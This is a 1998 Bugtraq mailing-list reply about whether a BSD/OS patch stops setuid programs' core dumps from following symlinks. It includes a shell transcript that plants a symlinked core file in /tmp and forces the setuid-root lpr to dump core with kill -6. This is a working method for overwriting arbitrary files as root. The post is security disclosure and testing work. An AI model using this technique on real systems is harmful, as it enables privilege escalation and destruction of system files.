Bugtraq mailing list archives
Re: BSD coredumps follow symlinks
From: scorpios () CS HUJI AC IL (Nir Soffer)
Date: Thu, 2 Apr 1998 11:48:46 +0300
On Tue, 31 Mar 1998, Denis Papp wrote:
I have a system running BSD/OS 2.1 with all the patches from BSDi, including K210-029 which I quote: "This patch addresses a security problem with core dumps from setuid programs."
That's very wierd. Back when I found the same bug in BSDI 3.0 I tried the same in BSDi 2.1 and it didn't work. Maybe we used a different patch, but this is the transcript: jupiter[ /tmp ] uname -a BSD/OS jupiter.cs.huji.ac.il 2.1 BSDI BSD/OS 2.1 Kernel #4: Tue Oct 8 08:49:52 IST 1996 danny () chamsa cs huji ac il:/sys/compile/CHAMSA i386 jupiter[ /tmp ] ls -la lpr.core lrwxrwxrwt 1 root wheel 8 Apr 2 11:37 lpr.core@ -> /etc/BLA jupiter[ /tmp ] lpr & [1] 29989 jupiter[ /tmp ] [1] + Suspended (tty input) lpr jupiter[ /tmp ] kill -6 %1 jupiter[ /tmp ] fg lpr IOT trap jupiter[ /tmp ] ls -la /etc/BLA ls: /etc/BLA: No such file or directory jupiter[ /tmp ] jupiter[ /tmp ] ls -la `which lpr` -rwsr-sr-x 1 root daemon 26533 Feb 19 1996 /usr/local/bin/lpr* jupiter[ /tmp ] lpr will dump core if there is no symlink there. Maybe you failed to install the patch correctly? Regards, Nir. -- Nir Soffer * scorpios () cs huji ac il * http://www.cs.huji.ac.il/~scorpios "I wouldn't recommend sex drugs or insanity for everyone but they've always worked for me." -- Hunter S. Thompson Mail me with the subject 'get pgp key' for my PGP Public key.
Current thread:
- Re: Sun rpcbind, (continued)
- Re: Sun rpcbind Aaron Bornstein (Apr 10)
- QW vulnerability Glenn F. Maynard (Apr 07)
- AppleShare IP Mail Server Chris Wedgwood (Apr 07)
- Re: AppleShare IP Mail Server David Luyer (Apr 07)
- Re: AppleShare IP Mail Server James W. Abendschan (Apr 07)
- Geac ADVANCE library system security HOLE GAVRILIS DIMITR (Apr 02)
- Re: Geac ADVANCE library system security HOLE Damian Kelly (Apr 03)
- Announce : Nessus Alpha 1 Renaud Deraison (Apr 04)
- mailrc and pine security holes Michal Zalewski (Apr 05)
- ICQ Spoofer Seth McGann (Apr 05)
- Re: BSD coredumps follow symlinks Nir Soffer (Apr 02)
- Security hole in TMS/SMS standby (Apr 03)
- BSD coredumps follow symlinks Ronny Cook (Apr 02)
- Re: BSD coredumps follow symlinks Ronny Cook (Apr 05)
- QuakeI server serious hole (yawn) Chris Evans (Apr 06)
- The ICQ exploitation Center - www.wpi.edu/~smm/icq Seth McGann (Apr 06)
- Re: BSD coredumps follow symlinks Ariel Biener (Apr 06)